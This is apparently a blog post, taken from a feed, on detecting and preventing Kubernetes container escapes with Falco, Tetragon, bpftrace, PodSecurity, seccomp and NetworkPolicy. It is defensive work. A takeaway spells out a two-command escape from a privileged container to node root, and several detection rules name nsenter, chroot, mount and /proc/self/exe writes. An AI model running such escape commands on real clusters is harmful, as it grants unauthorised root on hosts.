<p>Detecting container escape attempts requires visibility below the Kubernetes API layer. Audit logs show pod creation — they do not show what a process inside the container does with <code class="" data-line="">mount</code>, <code class="" data-line="">nsenter</code>, or <code class="" data-line="">/proc/self/exe</code>. eBPF-based tools (Falco, Tetragon) attach to kernel hooks and observe syscalls regardless of what namespace or container they originate from.</p>
<h3 id="falco-privileged-container-and-mount-detection">Falco: Privileged Container and Mount Detection</h3>
<pre><code class="" data-line=""># Falco rules for container escape detection
# /etc/falco/rules.d/container-escape.yaml

# Rule 1: Privileged container started
- rule: Privileged Container Started
  desc: &gt;
    A container running with --privileged was started.
    This removes all capability and seccomp restrictions.
  condition: &gt;
    container.privileged = true and
    evt.type = execve and
    container.id != host
  output: &gt;
    Privileged container started
    (user=%user.name user_uid=%user.uid
     command=%proc.cmdline
     container_id=%container.id
     container_name=%container.name
     image=%container.image.repository:%container.image.tag
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, privilege-escalation, OWASP-A05]

# Rule 2: Mount syscall from inside a container
- rule: Container Mount Syscall
  desc: &gt;
    A process inside a container invoked mount().
    In a non-privileged container this fails; in a privileged container
    it succeeds and may be mounting host block devices.
  condition: &gt;
    evt.type = mount and
    container.id != host and
    not proc.name in (container_runtime_processes)
  output: &gt;
    Mount syscall from container
    (user=%user.name
     command=%proc.cmdline
     mount_source=%evt.arg.source
     mount_target=%evt.arg.target
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, OWASP-A04]

# Rule 3: nsenter or chroot invoked inside container
- rule: Namespace Enter or Chroot in Container
  desc: &gt;
    nsenter or chroot executed from within a running container.
    nsenter with -t 1 enters host namespaces directly.
  condition: &gt;
    evt.type = execve and
    container.id != host and
    proc.name in (nsenter, chroot)
  output: &gt;
    nsenter/chroot executed in container
    (user=%user.name
     command=%proc.cmdline
     parent=%proc.pname
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, T1611]

# Rule 4: Process reading host PID tree (hostPID indicator)
- rule: Container Reading Host Process List
  desc: &gt;
    A process inside a container is reading /proc entries for PIDs
    that don&#039;t belong to it — indicates hostPID=true and enumeration.
  condition: &gt;
    evt.type = openat and
    fd.name startswith /proc/ and
    fd.name endswith /status and
    container.id != host and
    not fd.name startswith /proc/self
  output: &gt;
    Container reading host process status
    (proc=%proc.cmdline fd=%fd.name
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, discovery, T1057]
</code></pre>
<h3 id="tetragon-tracingpolicy-for-nsenter-and-mount-syscalls">Tetragon: TracingPolicy for nsenter and Mount Syscalls</h3>
<p>Tetragon attaches eBPF programs at LSM (Linux Security Module) hooks and kernel function entry/exit points. Unlike Falco which uses a single tracepoint aggregation model, Tetragon can enforce at the kernel level — it can block a syscall before it completes, not just alert after the fact.</p>
<pre><code class="" data-line=""># Tetragon TracingPolicy: detect and optionally block container escape attempts
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: container-escape-detection
  namespace: kube-system
spec:
  kprobes:
    # Hook 1: sys_mount — detect any mount() call from a container process
    - call: &quot;sys_mount&quot;
      return: false
      syscall: true
      args:
        - index: 0
          type: &quot;string&quot;     # source device (e.g. /dev/sda1)
        - index: 1
          type: &quot;string&quot;     # target mount point
        - index: 2
          type: &quot;string&quot;     # filesystem type
      selectors:
        # Only fire for container processes (not the container runtime itself)
        - matchNamespaces:
          - namespace: Pid
            operator: NotIn
            values:
              - &quot;host_ns&quot;   # Tetragon keyword for the host namespace (a numeric namespace ID also works)
          matchActions:
          - action: Post        # Post = log; change to Sigkill to enforce

    # Hook 2: __x64_sys_execve for nsenter binary
    - call: &quot;__x64_sys_execve&quot;
      return: false
      syscall: true
      args:
        - index: 0
          type: &quot;string&quot;     # filename being executed
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - &quot;/nsenter&quot;
          matchActions:
          - action: Post

    # Hook 3: write to /proc/self/exe — runc CVE class indicator
    - call: &quot;vfs_write&quot;
      return: false
      syscall: false
      args:
        - index: 0
          type: &quot;file&quot;
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - &quot;/proc/self/exe&quot;
          matchActions:
          - action: Sigkill   # Block immediately — no legitimate use case for this write
</code></pre>
<h3 id="bpftrace-quick-node-level-validation">bpftrace: Quick Node-Level Validation</h3>
<p>Before deploying Tetragon, you can validate that mount syscalls are observable from the host using bpftrace directly on a node:</p>
<pre><code class="" data-line=""># Run on the Kubernetes node (requires root or CAP_BPF)
# Safe observation mode — shows mount attempts from any process including containers

bpftrace -e &#039;
tracepoint:syscalls:sys_enter_mount {
  printf(&quot;%-8d %-20s %-30s -&gt; %-30s type=%s\n&quot;,
    pid, comm,
    str(args-&gt;dev_name),   // source device
    str(args-&gt;dir_name),   // mount target
    str(args-&gt;type));      // filesystem type
}
&#039; 2&gt;/dev/null
# Sample output:
# PID      COMM                 SOURCE                         TARGET                         TYPE
# 38471    bash                 /dev/sda1                      /mnt/host                      ext4
# 38471 and comm=bash from inside a container = escape attempt in progress
</code></pre>
<pre><code class="" data-line=""># Watch for nsenter executions across all processes on the node
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_execve {
  if (str(args-&gt;filename) == &quot;/usr/bin/nsenter&quot; ||
      str(args-&gt;filename) == &quot;/bin/nsenter&quot;) {
    printf(&quot;nsenter called: pid=%d ppid=%d comm=%s\n&quot;,
      pid, curtask-&gt;real_parent-&gt;pid, comm);
  }
}
&#039; 2&gt;/dev/null
</code></pre>
<h3 id="what-kubernetes-audit-logs-show-and-what-they-miss">What Kubernetes Audit Logs Show (and What They Miss)</h3>
<p>Kubernetes audit logs record API server activity. They show pod creation with <code class="" data-line="">--privileged</code> set — but only if you are watching pod spec creation events. They do not show anything that happens inside the container after it starts.</p>
<pre><code class="" data-line=""># Enable audit policy to capture pod creation with privileged spec
# /etc/kubernetes/audit-policy.yaml (excerpt)

apiVersion: audit.k8s.io/v1
kind: Policy
rules:
  # Log pod creation at RequestResponse level (captures full spec)
  - level: RequestResponse
    resources:
      - group: &quot;&quot;
        resources: [&quot;pods&quot;]
    verbs: [&quot;create&quot;, &quot;update&quot;, &quot;patch&quot;]

  # Log exec into pods — this is the entry point for escape attempts
  - level: RequestResponse
    resources:
      - group: &quot;&quot;
        resources: [&quot;pods/exec&quot;]
    verbs: [&quot;create&quot;]
</code></pre>
<pre><code class="" data-line=""># Parse audit log for privileged pod creation
grep &#039;&quot;privileged&quot;:true&#039; /var/log/kubernetes/audit.log | \
  jq -r &#039;[
    .requestReceivedTimestamp,
    .user.username,
    .objectRef.namespace + &quot;/&quot; + .objectRef.name,
    &quot;privileged=true&quot;
  ] | join(&quot; | &quot;)&#039;

# Or via kubectl (if audit log backend is configured)
kubectl get events -A --field-selector reason=Created \
  -o json | \
  jq -r &#039;.items[] |
    select(.message | contains(&quot;privileged&quot;)) |
    [.metadata.namespace, .involvedObject.name, .message] |
    join(&quot; / &quot;)&#039;
</code></pre>
<p>The audit log gap is important to understand: <strong>audit logs are a first-alert layer for misconfigured pod creation, not a detection layer for in-progress escape</strong>. By the time you see a <code class="" data-line="">pods/exec</code> event in audit logs, the attacker already has a shell. eBPF-based detection at the syscall level is what catches the escape itself.</p>
<hr />
<h2 id="purple-phase-structural-fixes">Purple Phase: Structural Fixes</h2>
<h3 id="fix-1-podsecurity-admission-enforce-restricted-profile">Fix 1: PodSecurity Admission — Enforce Restricted Profile</h3>
<p>PodSecurity admission (built into Kubernetes 1.25+, replacing PodSecurityPolicy) enforces security profiles at the namespace level. The Restricted profile blocks <code class="" data-line="">--privileged</code>, <code class="" data-line="">hostPID</code>, <code class="" data-line="">hostNetwork</code>, <code class="" data-line="">hostPath</code> volumes, and requires dropping all capabilities.</p>
<pre><code class="" data-line=""># Enforce the Restricted PodSecurity profile on a namespace
# This blocks any pod that doesn&#039;t meet the criteria from scheduling
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    # enforce: pod is rejected at admission if spec violates Restricted
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    # audit: violations are logged but not rejected (useful for rollout)
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/audit-version: latest
    # warn: user gets a warning but pod is allowed (for migration)
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/warn-version: latest
</code></pre>
<p>What the Restricted profile blocks (relevant to escape paths):</p>
<pre><code class="" data-line=""># These settings satisfy Restricted — apply them explicitly so the PodSecurity
# admission controller does not reject your workloads (readOnlyRootFilesystem is extra hardening, not a Restricted requirement)

securityContext:
  # Pod-level
  runAsNonRoot: true
  seccompProfile:
    type: RuntimeDefault    # or Localhost with a custom profile

containers:
  - securityContext:
      allowPrivilegeEscalation: false
      privileged: false          # blocks Path 1
      capabilities:
        drop: [&quot;ALL&quot;]            # no CAP_SYS_ADMIN, no CAP_NET_ADMIN
        add: []                  # add only what is specifically required
      readOnlyRootFilesystem: true  # reduces attacker persistence options

# Pod spec — blocked by Restricted
spec:
  hostPID: false           # must be false (blocks Path 2)
  hostNetwork: false       # must be false
  hostIPC: false           # must be false
  volumes:                 # hostPath volumes blocked
    - name: app-data
      emptyDir: {}         # emptyDir, configMap, secret allowed; hostPath not
</code></pre>
<p><strong>Rollout approach for existing clusters:</strong></p>
<p>Start with <code class="" data-line="">warn</code> mode on all namespaces, identify violations, remediate, then promote to <code class="" data-line="">enforce</code>:</p>
<pre><code class="" data-line=""># Label all non-system namespaces with warn mode first
kubectl get namespaces -o json | \
  jq -r &#039;.items[] |
    select(.metadata.name | test(&quot;^(kube-system|kube-public|kube-node-lease)$&quot;) | not) |
    .metadata.name&#039; | \
  while read ns; do
    kubectl label namespace &quot;$ns&quot; \
      pod-security.kubernetes.io/warn=restricted \
      pod-security.kubernetes.io/warn-version=latest \
      --overwrite
    echo &quot;Labeled $ns&quot;
  done

# After a deployment cycle, check for warnings in admission logs
# Look for pods that would be rejected under enforce mode
kubectl get events -A --field-selector reason=FailedCreate \
  -o json | jq -r &#039;.items[] | select(.message | contains(&quot;violates PodSecurity&quot;))&#039;
</code></pre>
<h3 id="fix-2-runtimeclass-hardware-level-isolation-for-untrusted-workloads">Fix 2: RuntimeClass — Hardware-Level Isolation for Untrusted Workloads</h3>
<p>For workloads that cannot run under Restricted profile (CNI plugins, monitoring agents, specific DaemonSets), the alternative is a stronger isolation boundary: a hypervisor-level runtime.</p>
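<p>gVisor and Kata Containers both place an extra boundary between the container and the host kernel: gVisor intercepts system calls in a user-space kernel (the Sentry), while Kata Containers runs each pod inside a lightweight VM with its own guest kernel. Either way, a container escape exploiting a kernel vulnerability or a privileged mount hits the sandbox boundary, not the host kernel.</p>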
<pre><code class="" data-line=""># Define a RuntimeClass for gVisor (runsc)
# Requires gVisor installed on nodes with the runsc runtime handler
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc   # must match the handler name in containerd/crio config
scheduling:
  nodeSelector:
    runtime.gvisor: &quot;true&quot;   # only schedule on nodes that have gVisor
---
# Use the RuntimeClass in a pod spec
apiVersion: v1
kind: Pod
metadata:
  name: untrusted-workload
spec:
  runtimeClassName: gvisor   # all syscalls go through gVisor&#039;s sentry
  containers:
    - name: app
      image: untrusted-image:latest
</code></pre>
<pre><code class="" data-line=""># Kata Containers: hardware VM boundary, not just a user-space syscall interceptor
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: kata-containers
handler: kata-qemu
</code></pre>
<blockquote>
<p><strong>For operators:</strong> gVisor and Kata Containers have compatibility trade-offs. Not all syscalls are supported in gVisor (it implements a subset of the Linux ABI). Kata Containers have higher startup latency (VM boot time). Benchmark your specific workload before enforcing these on production-critical pods.</p>
</blockquote>
<h3 id="fix-3-seccomp-profile-block-the-syscalls-that-enable-escape">Fix 3: Seccomp Profile — Block the Syscalls That Enable Escape</h3>
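<p>Even without gVisor, a custom allowlist seccomp profile — default action deny, with only the syscalls the workload needs allowed — closes the primary escape syscall surface: <code class="" data-line="">mount</code>, <code class="" data-line="">unshare</code>, <code class="" data-line="">setns</code>, and <code class="" data-line="">pivot_root</code> are simply absent from the allowlist. Note that the example below allows <code class="" data-line="">clone</code> unconditionally so that ordinary process and thread creation keeps working; blocking <code class="" data-line="">clone</code> with namespace flags additionally requires an argument filter on that syscall.</p>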
<pre><code class="" data-line="">{
  &quot;defaultAction&quot;: &quot;SCMP_ACT_ERRNO&quot;,
  &quot;architectures&quot;: [&quot;SCMP_ARCH_X86_64&quot;, &quot;SCMP_ARCH_X86&quot;, &quot;SCMP_ARCH_X32&quot;],
  &quot;syscalls&quot;: [
    {
      &quot;names&quot;: [
        &quot;accept&quot;, &quot;accept4&quot;, &quot;access&quot;, &quot;arch_prctl&quot;,
        &quot;bind&quot;, &quot;brk&quot;, &quot;capget&quot;, &quot;capset&quot;,
        &quot;chdir&quot;, &quot;chmod&quot;, &quot;chown&quot;, &quot;clock_gettime&quot;,
        &quot;clone&quot;,
        &quot;close&quot;, &quot;connect&quot;,
        &quot;dup&quot;, &quot;dup2&quot;, &quot;dup3&quot;,
        &quot;execve&quot;, &quot;exit&quot;, &quot;exit_group&quot;,
        &quot;fchmod&quot;, &quot;fchown&quot;, &quot;fcntl&quot;,
        &quot;fstat&quot;, &quot;fstatfs&quot;, &quot;fsync&quot;,
        &quot;futex&quot;, &quot;getcwd&quot;, &quot;getdents64&quot;,
        &quot;getegid&quot;, &quot;geteuid&quot;, &quot;getgid&quot;, &quot;getgroups&quot;,
        &quot;getpeername&quot;, &quot;getpid&quot;, &quot;getppid&quot;,
        &quot;getrlimit&quot;, &quot;getsockname&quot;, &quot;getsockopt&quot;,
        &quot;gettid&quot;, &quot;gettimeofday&quot;, &quot;getuid&quot;,
        &quot;inotify_add_watch&quot;, &quot;inotify_init1&quot;,
        &quot;listen&quot;, &quot;lseek&quot;, &quot;lstat&quot;,
        &quot;madvise&quot;, &quot;mmap&quot;, &quot;mprotect&quot;,
        &quot;munmap&quot;, &quot;nanosleep&quot;,
        &quot;open&quot;, &quot;openat&quot;,
        &quot;pipe&quot;, &quot;pipe2&quot;, &quot;poll&quot;, &quot;ppoll&quot;,
        &quot;prctl&quot;, &quot;pread64&quot;, &quot;pwrite64&quot;,
        &quot;read&quot;, &quot;readlink&quot;, &quot;readv&quot;,
        &quot;recvfrom&quot;, &quot;recvmsg&quot;, &quot;recvmmsg&quot;,
        &quot;rename&quot;, &quot;rt_sigaction&quot;, &quot;rt_sigprocmask&quot;,
        &quot;rt_sigreturn&quot;, &quot;sched_getaffinity&quot;,
        &quot;select&quot;, &quot;sendfile&quot;, &quot;sendmsg&quot;, &quot;sendto&quot;,
        &quot;set_robust_list&quot;, &quot;set_tid_address&quot;,
        &quot;setgid&quot;, &quot;setgroups&quot;, &quot;setuid&quot;,
        &quot;setsockopt&quot;, &quot;shutdown&quot;,
        &quot;socket&quot;, &quot;socketpair&quot;,
        &quot;stat&quot;, &quot;statfs&quot;, &quot;symlink&quot;,
        &quot;tgkill&quot;, &quot;time&quot;, &quot;timerfd_create&quot;,
        &quot;timerfd_settime&quot;, &quot;truncate&quot;,
        &quot;uname&quot;, &quot;unlink&quot;, &quot;unlinkat&quot;,
        &quot;wait4&quot;, &quot;waitid&quot;,
        &quot;write&quot;, &quot;writev&quot;
      ],
      &quot;action&quot;: &quot;SCMP_ACT_ALLOW&quot;
    }
  ]
}
</code></pre>
<p>Apply via pod spec:</p>
<pre><code class="" data-line="">spec:
  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: &quot;container-escape-block.json&quot;
      # Profile must be in /var/lib/kubelet/seccomp/ on each node
</code></pre>
<pre><code class="" data-line=""># Distribute the seccomp profile to all nodes via DaemonSet
# Example using a DaemonSet that copies the profile file on startup
# (or use the built-in RuntimeDefault, which blocks several dozen dangerous syscalls out of the 300+ available)

# RuntimeDefault blocks: mount, unshare, clone with new-ns flags,
# add_key, keyctl, request_key, pivot_root — adequate for most workloads
spec:
  securityContext:
    seccompProfile:
      type: RuntimeDefault
</code></pre>
<h3 id="fix-4-network-policy-contain-the-blast-radius-after-escape">Fix 4: Network Policy — Contain the Blast Radius After Escape</h3>
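<p>Even if a container escapes to the node, a network policy that prevents the escaped process from reaching the Kubernetes API server limits what the attacker can do with node credentials. Keep in mind that NetworkPolicy is enforced on pod traffic: a process that is fully inside the host network namespace is outside its scope, so pair these policies with node-level firewalling and tightly scoped node credentials.</p>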
<pre><code class="" data-line=""># Deny all egress from application namespace to Kubernetes API server
# The API server typically runs on port 6443 on the control plane nodes
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-api-server-egress
  namespace: production
spec:
  podSelector: {}       # applies to all pods in namespace
  policyTypes:
    - Egress
  egress:
    # Allow DNS
    - ports:
        - protocol: UDP
          port: 53
    # Allow application traffic (customize per workload)
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: production
    # Explicitly: no rule allowing egress to control plane CIDR
    # This is a deny-by-absence — egress to control plane falls through to default deny
</code></pre>
<pre><code class="" data-line=""># Also block pod-to-pod communication across namespaces
# to prevent an escaped pod from pivoting to other workloads
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}
  policyTypes:
    - Ingress
    - Egress
  # No ingress or egress rules = deny all
  # Add specific rules above this as needed
</code></pre>
<h3 id="fix-5-node-isolation-co-location-risk">Fix 5: Node Isolation — Co-location Risk</h3>
<p>An internet-facing pod and a pod with access to sensitive internal services should not share a node. If the internet-facing pod escapes, it reaches the node&#8217;s credentials and can pivot to anything else scheduled on that node.</p>
<pre><code class="" data-line=""># Use node selectors, taints, and tolerations to separate workload tiers

# Taint sensitive nodes so only specific workloads schedule there
kubectl taint nodes sensitive-node-1 workload-tier=sensitive:NoSchedule

# Internet-facing pods: dedicated public-tier nodes
# Internal/privileged pods: dedicated sensitive-tier nodes

# Pod spec for internet-facing workload — only schedules on public nodes
spec:
  nodeSelector:
    workload-tier: public
  tolerations: []   # No toleration for sensitive node taint

# Pod spec for sensitive workload — only schedules on sensitive nodes
spec:
  nodeSelector:
    workload-tier: sensitive
  tolerations:
    - key: workload-tier
      operator: Equal
      value: sensitive
      effect: NoSchedule
</code></pre>
<hr />
<h2 id="production-gotchas"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Production Gotchas</h2>
<p><strong>Legitimate workloads that require <code class="" data-line="">--privileged</code> or hostPID.</strong> CNI plugins (Cilium, Calico, Flannel node agents), node-local-dns, monitoring agents (node exporters, eBPF-based agents like Tetragon itself), and storage drivers often need elevated access. Blanket enforcement of Restricted profile without exceptions breaks these workloads. The approach: enforce Restricted on application namespaces; use a dedicated namespace for infrastructure DaemonSets with the Baseline or Privileged policy and compensate with Falco detection and node isolation.</p>
<p><strong>The seccomp profile required by Restricted blocks some monitoring agents.</strong> The RuntimeDefault seccomp profile that the Restricted policy requires blocks several syscalls that APM agents and profiling tools use. Run <code class="" data-line="">strace -c -f ./your-agent</code> to capture the syscall profile of your monitoring agent before enforcing Restricted. Common culprits: <code class="" data-line="">perf_event_open</code> (used by profilers), <code class="" data-line="">ptrace</code> (used by some debuggers), <code class="" data-line="">bpf</code> (used by eBPF-based tools). Add these to an allowlist seccomp profile rather than running the agent without any profile.</p>
<p><strong>runc CVEs require node patching, not policy.</strong> PodSecurity admission and Falco rules protect against configuration-based escapes. A vulnerability in runc, containerd, or the Linux kernel itself bypasses policy-based controls entirely. Keep container runtime versions current; enable automatic node OS patching (Bottlerocket, Flatcar Linux) if your infrastructure allows it. Subscribe to CVE feeds for containerd (<code class="" data-line="">containerd/containerd</code>) and runc (<code class="" data-line="">opencontainers/runc</code>) specifically.</p>
<p><strong>hostPath volumes are a partial equivalent to <code class="" data-line="">--privileged</code>.</strong> A pod without <code class="" data-line="">--privileged</code> but with a hostPath volume mounting <code class="" data-line="">/etc</code> or <code class="" data-line="">/var/lib/kubelet</code> can read node credentials without needing to mount a block device. PodSecurity Baseline and Restricted both forbid hostPath volumes; only the Privileged level allows them, so any namespace left at Privileged needs its own check. Audit for hostPath volumes separately from <code class="" data-line="">--privileged</code>.</p>
<p><strong>RuntimeClass with gVisor has syscall compatibility gaps.</strong> Applications that use <code class="" data-line="">io_uring</code>, certain socket options, or kernel modules will not work under gVisor&#8217;s sentry. Test in staging before deploying to production. The gVisor compatibility matrix is documented at gvisor.dev/docs/user_guide/compatibility — check it for any application that does direct filesystem I/O at high volume (databases, high-throughput queues) as the overhead may be unacceptable even if the syscalls are supported.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>Escape Path</th>
<th>Precondition</th>
<th>Detection Signal</th>
<th>Structural Fix</th>
</tr>
</thead>
<tbody>
<tr>
<td>Privileged container → mount</td>
<td><code class="" data-line="">privileged: true</code></td>
<td>Falco: mount syscall from container; Tetragon: sys_mount kprobe</td>
<td>PodSecurity Restricted enforce; seccomp blocks mount</td>
</tr>
<tr>
<td>hostPID + nsenter</td>
<td><code class="" data-line="">hostPID: true</code></td>
<td>Falco: nsenter exec in container; audit log: pod creation with hostPID</td>
<td>PodSecurity Restricted (blocks hostPID)</td>
</tr>
<tr>
<td>hostNetwork + IMDS</td>
<td><code class="" data-line="">hostNetwork: true</code></td>
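<td>CloudWatch <code class="" data-line="">MetadataNoToken</code> metric (IMDSv1 calls); CloudTrail: node role credentials used from an unexpected source</td>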
<td>Enforce IMDSv2 hop limit 1; PodSecurity Restricted</td>
</tr>
<tr>
<td>runc CVE (CVE-2019-5736)</td>
<td>Unpatched runc</td>
<td>Tetragon: vfs_write to /proc/self/exe</td>
<td>Patch runc/containerd; use RuntimeClass (gVisor)</td>
</tr>
<tr>
<td>hostPath volume mount</td>
<td>hostPath to sensitive path</td>
<td>Falco: sensitive host file access; PodSecurity audit</td>
<td>PodSecurity Restricted (blocks hostPath)</td>
</tr>
<tr>
<td>Escaped → API server</td>
<td>Node credential access</td>
<td>Audit log: API calls from node IP at unexpected time</td>
<td>Network policy blocking node→API server egress</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li><strong>Kubernetes container escape</strong> starts at the kernel: <code class="" data-line="">--privileged</code>, <code class="" data-line="">hostPID</code>, and <code class="" data-line="">hostNetwork</code> remove Linux namespace and cgroup isolation — the Kubernetes API cannot prevent what happens inside a process that runs with those flags</li>
<li>Two commands from privileged container to root on the node: <code class="" data-line="">mount /dev/sda1 /mnt/host</code> and <code class="" data-line="">chroot /mnt/host /bin/bash</code> — this is not a sophisticated exploit, it is a default kernel behavior</li>
<li>eBPF detection (Falco, Tetragon) operates at the syscall level and catches the escape in progress; Kubernetes audit logs only catch the misconfigured pod creation, not the exploitation</li>
<li>PodSecurity Restricted enforcement at the namespace level is the structural fix for configuration-based escapes — it blocks <code class="" data-line="">--privileged</code>, <code class="" data-line="">hostPID</code>, <code class="" data-line="">hostNetwork</code>, and hostPath volumes before a pod schedules</li>
<li>runc-class CVEs are independent of configuration — node-level patching and RuntimeClass (gVisor/Kata) isolation are the controls, not policy enforcement</li>
<li>Network policy as a secondary layer limits post-escape lateral movement: a container that escapes to the node should not be able to reach the API server with stolen node credentials</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>Container escape requires access to a running pod. But what if the attacker didn&#8217;t need to exploit anything at runtime — they shipped the attack as a dependency your build pipeline trusted? EP09 covers supply chain attacks from SolarWinds to XZ Utils: how a malicious package or a compromised build step becomes arbitrary code execution before the container ever runs, the detection patterns that are specific to supply chain compromise (dependency confusion, typosquatting, malicious maintainer takeovers), and the SLSA framework controls that create a verifiable chain of custody from source to deployed artifact.</p>
<p>Get EP09 in your inbox when it publishes → <a href="#subscribe">subscribe at linuxcent.com</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fkubernetes-container-escape-attack-paths%2F&amp;linkname=Kubernetes%20Container%20Escape%3A%20Attack%20Paths%20and%20eBPF%20Detection" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fkubernetes-container-escape-attack-paths%2F&amp;linkname=Kubernetes%20Container%20Escape%3A%20Attack%20Paths%20and%20eBPF%20Detection" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fkubernetes-container-escape-attack-paths%2F&amp;linkname=Kubernetes%20Container%20Escape%3A%20Attack%20Paths%20and%20eBPF%20Detection" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fkubernetes-container-escape-attack-paths%2F&amp;linkname=Kubernetes%20Container%20Escape%3A%20Attack%20Paths%20and%20eBPF%20Detection" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fkubernetes-container-escape-attack-paths%2F&amp;linkname=Kubernetes%20Container%20Escape%3A%20Attack%20Paths%20and%20eBPF%20Detection" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fkubernetes-container-escape-attack-paths%2F&amp;linkname=Kubernetes%20Container%20Escape%3A%20Attack%20Paths%20and%20eBPF%20Detection" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" 
href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fkubernetes-container-escape-attack-paths%2F&amp;linkname=Kubernetes%20Container%20Escape%3A%20Attack%20Paths%20and%20eBPF%20Detection" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fkubernetes-container-escape-attack-paths%2F&#038;title=Kubernetes%20Container%20Escape%3A%20Attack%20Paths%20and%20eBPF%20Detection" data-a2a-url="https://linuxcent.com/kubernetes-container-escape-attack-paths/" data-a2a-title="Kubernetes Container Escape: Attack Paths and eBPF Detection"></a></p><p>The post <a href="https://linuxcent.com/kubernetes-container-escape-attack-paths/">Kubernetes Container Escape: Attack Paths and eBPF Detection</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/kubernetes-container-escape-attack-paths/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1864</post-id>	</item>
		<item>
		<title>SSRF to Cloud Metadata: How IMDSv1 Enabled the Capital One Breach</title>
		<link>https://linuxcent.com/ssrf-cloud-metadata-imds-capital-one/</link>
					<comments>https://linuxcent.com/ssrf-cloud-metadata-imds-capital-one/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Mon, 22 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[Purple Team]]></category>
		<category><![CDATA[AWS]]></category>
		<category><![CDATA[Capital One]]></category>
		<category><![CDATA[Cloud Security]]></category>
		<category><![CDATA[IMDS]]></category>
		<category><![CDATA[IMDSv2]]></category>
		<category><![CDATA[SSRF]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1861</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 15</span> <span class="rt-label rt-postfix">minutes</span></span>SSRF to IMDSv1 is a straight line to IAM credentials — Capital One proved it at 100M-record scale. How the attack chain works and why IMDSv2 enforcement is non-negotiable.</p>
<p>The post <a href="https://linuxcent.com/ssrf-cloud-metadata-imds-capital-one/">SSRF to Cloud Metadata: How IMDSv1 Enabled the Capital One Breach</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 15</span> <span class="rt-label rt-postfix">minutes</span></span><style>
/* Code blocks: dark panel. position:relative anchors the absolutely
   positioned language badge and copy button defined further down. */
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
/* Inline code gets a light chip; code nested in <pre> inherits the dark panel. */
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
/* Left-border accent keyed on the data-lang attribute. */
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
